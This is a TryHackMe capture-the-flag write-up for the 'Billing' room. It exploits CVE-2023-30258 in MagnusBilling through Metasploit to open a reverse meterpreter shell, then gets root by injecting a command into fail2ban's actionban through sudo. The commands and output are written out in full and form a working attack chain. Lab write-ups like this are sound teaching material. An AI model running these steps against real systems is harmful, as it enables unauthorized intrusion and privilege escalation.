TryHackMe: Billing

Description

In the Billing TryHackMe challenge, we’ll exploit CVE-2023-30258 to gain initial access to the MagnusBilling platform via unauthenticated remote code execution. Then, escalate privileges by abusing a misconfigured fail2ban service to achieve root access.

Enumeration

Start with an nmap scan to identify open ports and services:

❯ nmap 10.10.254.59 -sC -sV

Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 13:59 UTC
Nmap scan report for 10.10.254.59
Host is up (0.37s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_  256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
| http-title:             MagnusBilling        
|_Requested resource was http://10.10.254.59/mbilling/
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 42.36 seconds

Open Ports Identified:

22/tcp: SSH (OpenSSH 8.4p1)
80/tcp: HTTP (Apache 2.4.56)
3306/tcp: MySQL (MariaDB 10.3.23 or earlier)

Let’s start by focusing on HTTP website, since the other three ports don’t seem to offer anything noteworthy at the moment. If you look closely to the scanning output, there’s an application called MagnusBilling running. A quick Google search of that application reveals a known vulnerability, CVE-2023-30258, and it turns out there’s a Metasploit exploit available for it.

Exploitation

Launch Metasploit and configure the exploit:

msf6 > search magnusbilling_unauth_rce_cve_2023_30258

Matching Modules
================
   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOSTS 10.10.254.59
RHOSTS => 10.10.254.59

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.13.82.190
LHOST => 10.13.82.190

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 10.13.82.190:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.254.59:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.83 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.254.59
[+] Deleted CCfDLivv.php
[*] Meterpreter session 1 opened (10.13.82.190:4444 -> 10.10.254.59:42936) at 2025-03-20 19:26:50 +0000

Drop into a shell and upgrade it to a full TTY:

meterpreter > shell
Process 1545 created.
Channel 0 created.

python3 -c 'import pty; pty.spawn("/bin/bash")'
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ 

Note: The Python PTY module docs upgrades the shell to a fully interactive TTY. Learn more about TTYs here.

Now, locate the user.txt flag:

asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd /home
asterisk@Billing:/home$ ls
magnus
asterisk@Billing:/home$ cd magnus
asterisk@Billing:/home/magnus$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
asterisk@Billing:/home/magnus$ cat user.txt
THM{USER_FLAG_HERE}

Privilege Escalation

Check for sudo privileges:

asterisk@Billing:/home/magnus$ sudo -l
Matching Defaults entries for asterisk on Billing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client

The user asterisk can run /usr/bin/fail2ban-client as root without a password. Verify that fail2ban is running:

asterisk@Billing:/home/magnus$ systemctl status fail2ban
● fail2ban.service - Fail2Ban Service
     Loaded: loaded (/lib/systemd/system/fail2ban.service; enabled; vendor preset: enabled)
     Active: active (running) since Thu 2025-03-20 10:20:01 HDT; 36min ago
       Docs: man:fail2ban(1)
    Process: 526 ExecStartPre=/bin/mkdir -p /run/fail2ban (code=exited, status=0/SUCCESS)
   Main PID: 542 (fail2ban-server)
      Tasks: 19 (limit: 2268)
     Memory: 27.4M
        CPU: 6.366s
     CGroup: /system.slice/fail2ban.service
             └─542 /usr/bin/python3 /usr/bin/fail2ban-server -xf start

fail2ban-client allows us to manipulate jail actions. We can abuse the actionban parameter to execute commands as root. Set a malicious actionban command to copy root.txt to a readable location:

asterisk@Billing:/home/magnus$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Trigger the action by banning an IP (e.g., localhost):

asterisk@Billing:/home/magnus$ sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1
1

Note: If the file doesn’t appear, ensure fail2ban is running (sudo /usr/bin/fail2ban-client restart) and retry the above 2 steps again.

Read the flag:

asterisk@Billing:/home/magnus$ cat /tmp/root.txt
THM{ROOT_FLAG_HERE}

Conclusion

By exploiting CVE-2023-30258, we gained initial access as the asterisk user via Metasploit. Then, leveraging a misconfigured fail2ban service with sudo privileges, we escalated to root and captured both flags. This challenge highlights the dangers of unpatched software and overly permissive configurations.